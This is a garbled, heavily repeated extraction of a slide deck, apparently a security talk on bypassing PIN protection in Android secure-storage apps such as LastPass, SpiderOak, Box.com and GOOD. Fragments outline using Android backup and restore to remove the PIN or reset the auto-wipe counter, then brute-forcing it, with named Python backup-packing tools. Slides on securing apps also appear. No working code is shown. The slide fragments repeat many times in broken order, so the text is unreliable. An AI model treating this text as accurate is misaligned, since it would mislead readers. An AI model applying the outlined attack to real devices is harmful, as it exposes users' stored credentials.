Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


